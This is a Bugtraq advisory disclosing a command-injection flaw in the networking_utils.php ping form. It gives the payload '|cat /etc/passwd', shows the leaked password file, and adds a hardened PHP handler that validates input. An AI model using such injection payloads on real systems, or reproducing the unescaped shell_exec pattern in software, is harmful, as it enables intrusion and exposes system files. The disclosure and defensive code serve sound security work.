Bugtraq mailing list archives

networking_utils.php


From: Tacettin Karadeniz <tacettinkaradeniz () yahoo com>
Date: Tue, 5 Nov 2002 13:05:56 -0800 (PST)

Title:
The bug in networking_utils.php
(http://www.sourcecraft.org/downloads)
networking_utils(PHP) Show Files Vulnerability

Summary:
networking_utils.php
Includes a ping function, a traceroute function, and
an nslookup function.

Vulnerable systems:
networking_utils
The networking_utils.php file of the networking_utils PHP
script allows remote visitors
to view any file on the web server.

Example:
The following command is entered in the "Domain name or IP
address" field (Ping Utility):

|cat /etc/passwd

With this command, the password file is displayed in the web
browser.


Ping Results For : |cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash
cilek:x:501:501:cilek:/home/cilek:/bin/bash
avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash
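
The output above is consistent with the form value reaching a shell unescaped. The following is an added example, not code from networking_utils.php or its author (function names are hypothetical, and `ping -c 4` assumes a Unix ping): the assumed vulnerable pattern beside a handler that validates the target and starts ping without a shell.

```php
<?php
// Added example; names are hypothetical and the script's real source is not shown on this page.

// Assumed vulnerable pattern: the form value is concatenated into a command line,
// so /bin/sh interprets metacharacters such as | ; & ` and $( ).
function ping_unsafe(string $host): string
{
    return (string) shell_exec("ping -c 4 " . $host);
}

// Accept only an IP literal or a syntactically valid hostname.
function valid_target(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // Hostname labels: letters, digits, hyphens, never starting or ending with a hyphen.
    // \A and \z anchor the whole string, so a trailing newline does not slip through.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($host) <= 253
        && preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/i', $host) === 1;
}

// Hardened handler: validate first, then run ping from an argument array.
function ping_safe(string $host): string
{
    if (!valid_target($host)) {
        return 'Invalid host name or IP address.';
    }
    // Array form of proc_open (PHP 7.4+) starts the program directly, with no shell.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(['ping', '-c', '4', $host], $spec, $pipes);
    if (!is_resource($proc)) {
        return 'Could not run ping.';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    // The result is rendered in a browser, so encode it for HTML.
    return htmlspecialchars((string) $out, ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: only the validator runs here, so no process is started.
foreach (['192.0.2.10', 'example.org', '|cat /etc/passwd', '-f', "example.org\n"] as $in) {
    printf("%-22s %s\n", json_encode($in), valid_target($in) ? 'accepted' : 'rejected');
}
```

The leading-hyphen rejection matters even without a shell, because a value such as `-f` would otherwise be parsed by ping as an option.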
